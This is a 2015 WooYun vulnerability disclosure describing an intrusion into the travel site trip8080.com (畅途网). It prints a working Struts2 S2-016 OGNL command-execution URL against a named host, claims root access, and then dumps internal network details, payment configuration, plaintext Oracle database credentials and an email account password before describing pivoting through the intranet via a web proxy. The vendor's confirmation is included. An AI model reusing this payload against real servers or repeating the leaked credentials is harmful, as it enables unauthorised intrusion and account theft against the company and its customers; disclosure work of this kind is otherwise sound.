当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099081

漏洞标题:畅途网内网漫游记

相关厂商:畅途网

漏洞作者: Forever80s

提交时间:2015-03-03 15:13

修复时间:2015-04-17 15:14

公开时间:2015-04-17 15:14

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-03: 厂商已经确认,细节仅向厂商公开
2015-03-13: 细节向核心白帽子及相关领域专家公开
2015-03-23: 细节向普通白帽子公开
2015-04-02: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

学大牛们们漫游一下内网

详细说明:

发现一个网站http://mis.trip8080.com有s2-016漏洞

http://mis.trip8080.com/station/rand.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream
%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get
%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29


root权限getshell ,免提式
然后发现这个主机可以管理好多网站包括主站
ok看看
这个是一个服务器目录

站群1.PNG


每个服务器目录下都有war就是网站:长途汽车站信息管理系统-畅途网

站群2.PNG


我们再看看其他网站

站群3.PNG


war都是网站目录

站群4.PNG


有一个oracle用户其home目录里也有好多服务器

站群5.PNG


继续看web服务器里有什么

站群6.PNG


这个是主站

站群7.PNG


看到最后修改日期了吗?
怎么知道是主站呢?我们看一个特征文件

站群9.PNG


你可以访问一下

http://www.trip8080.com/5ac73da4824100ac52100d7577aa8fae.html


这里还有主站的cron最新备份

站群8.PNG


该主机是在内网

ifconfig
====================================================================================================================================
eth0 Link encap:Ethernet HWaddr E4:1F:13:68:DC:60
inet addr:172.19.0.31 Bcast:172.19.0.255 Mask:255.255.255.0
inet6 addr: fe80::e61f:13ff:fe68:dc60/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4282524440 errors:36366664 dropped:36376895 overruns:0 frame:36366664
TX packets:5406440041 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1069298496031 (995.8 GiB) TX bytes:3111623545115 (2.8 TiB)
Interrupt:169 Memory:92000000-92012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2238316 errors:0 dropped:0 overruns:0 frame:0
TX packets:2238316 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:351788488 (335.4 MiB) TX bytes:351788488 (335.4 MiB)
usb0 Link encap:Ethernet HWaddr E6:1F:13:5A:DC:63
inet6 addr: fe80::e41f:13ff:fe5a:dc63/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22286280 errors:0 dropped:0 overruns:0 frame:0
TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1448608200 (1.3 GiB) TX bytes:6752 (6.5 KiB)


找点敏感信息
主站支付配置文件

//home/oracle/jbossweb2/slwt.war/WEB-INF/config/trip8080-payment.xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:p="http://www.springframework.org/schema/p"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans-3.0.xsd">
<bean id="trip8080PaymentConfiguration" class="com.trip8080.core.payment.PaymentConfiguration">
<property name="config">
<map>
<!-- 支付宝支付
<entry key="alipayUrl" value="http://172.18.0.100/publicservice/alipay_pay.action"></entry>
<entry key="alipayUrlPremium" value="http://172.18.0.100/publicservice/premium_alipay_pay.action"></entry>
<entry key="alipayReturnUrl" value="http://localhost:8080/slwt/payReturn.jspx"></entry>
<entry key="alipayReturnUrlPre" value="http://localhost:8080/slwt/alipayReturn.jspx"></entry>-->

<!-- -->
<entry key="alipayUrl" value="http://ps.trip8080.com/alipay_pay.action"></entry>
<entry key="alipayUrlPremium" value="http://ps.trip8080.com/premium_alipay_pay.action"></entry>
<entry key="alipayReturnUrl" value="http://www.trip8080.com/payReturn.jspx"></entry>


<!-- 银联支付
<entry key="unionpayUrl" value="http://172.18.0.100/publicservice/union_pay.action"></entry>
<entry key="unionpayReturnUrl" value="http://localhost:8080/slwt/payReturn.jspx"></entry>
-->
<!-- -->
<entry key="unionpayUrl" value="http://ps.trip8080.com/union_pay.action"></entry>
<entry key="unionpayReturnUrl" value="http://www.trip8080.com/payReturn.jspx"></entry>

<!-- 财付通支付 -->
<entry key="tenpayUrl" value="http://ps.trip8080.com/tencent_pay.action"></entry>
<entry key="tenpayReturnUrl" value="http://www.trip8080.com/payReturn.jspx"></entry>
<!-- 最新版的支付接口 -->
<entry key="payUrl" value="http://ps.trip8080.com/pay.action"></entry>
<entry key="returnUrl" value="http://www.trip8080.com/payReturn.jspx"></entry>
<!--申请退款接口 个人账户到支付账户 -->
<entry key="applyReturn" value="http://tts.pub/publicservice/applyPersonalPayment.action"></entry>
<!--取消退款接口 -->
<entry key="rmoveReturn" value="http://tts.pub/publicservice/applyRemoveReturn.action"></entry>
<!--公司账户到个人账户或支付账户 -->
<entry key="applyReturnToPay" value="http://tts.pub/publicservice/applyReturnToPerOrPay.action"></entry>
</map>
</property>
</bean>
</beans>


主站数据库配置

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:tx="http://www.springframework.org/schema/tx"
xmlns:aop="http://www.springframework.org/schema/aop"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:p="http://www.springframework.org/schema/p"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans-3.0.xsd
http://www.springframework.org/schema/context
http://www.springframework.org/schema/context/spring-context-3.0.xsd
http://www.springframework.org/schema/tx
http://www.springframework.org/schema/tx/spring-tx-3.0.xsd
http://www.springframework.org/schema/aop
http://www.springframework.org/schema/aop/spring-aop-3.0.xsd">
<!-- 主库数据源 -->
<bean id="datasourceOracle" class="org.apache.commons.dbcp.BasicDataSource">
<property name="driverClassName" value="oracle.jdbc.OracleDriver" />
<property name="url" value="jdbc:oracle:thin:@//tts.oranew:1521/conn2" />
<property name="username" value="prod" />
<property name="password" value="ttsprodyfzx" />
<property name="maxActive" value="500" />
<property name="initialSize" value="20" />
<property name="maxWait" value="360000" />
<property name="minIdle" value="10" />
<property name="maxIdle" value="50" />
</bean>
<!-- 备库数据源 -->
<bean id="slaveDataSource" class="org.apache.commons.dbcp.BasicDataSource">
<property name="driverClassName" value="oracle.jdbc.OracleDriver" />
<property name="url" value="jdbc:oracle:thin:@//tts.oranew:1521/conn2"/>
<property name="username" value="prod" />
<property name="password" value="ttsprodyfzx" />
<property name="maxActive" value="500" />
<property name="initialSize" value="20" />
<property name="maxWait" value="360000" />
<property name="minIdle" value="10" />
<property name="maxIdle" value="50" />
</bean>
<!-- 主库JDBC -->
<bean id="jdbcTemplateOracle" class="org.springframework.jdbc.core.JdbcTemplate">
<property name="dataSource" ref="datasourceOracle"></property>
</bean>
<!-- 备库JDBC -->
<bean id="jdbcTemplateSlave" class="org.springframework.jdbc.core.JdbcTemplate">
<property name="dataSource" ref="slaveDataSource"></property>
</bean>
<!-- 事务配置 -->
<bean id="txManager" class="org.springframework.jdbc.datasource.DataSourceTransactionManager" p:dataSource-ref="datasourceOracle"></bean>
<!-- 开启事务 -->
<tx:annotation-driven transaction-manager="txManager"/>
</beans>


应该是支付宝帐号

#[email protected]
[email protected]
server=smtp.exmail.qq.com
[email protected]
[email protected]
password=025changtu
emailEncode=GBK
delay_time=30
backpwdUrl=http\://192.168.1.135\:8080/slwt
cronExpress=0 09-59 11 * * ?


大量帐号密码这里不一一列举啦
漫游一下内网吧
暂时没公网ip,就不弹shell了,走一下web代理吧

proxy.PNG


基本上整个系统沦陷了吧

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-03 18:47

厂商回复:

非常感谢,我们会尽快安排修改!请留下您的联系方式

最新状态:

暂无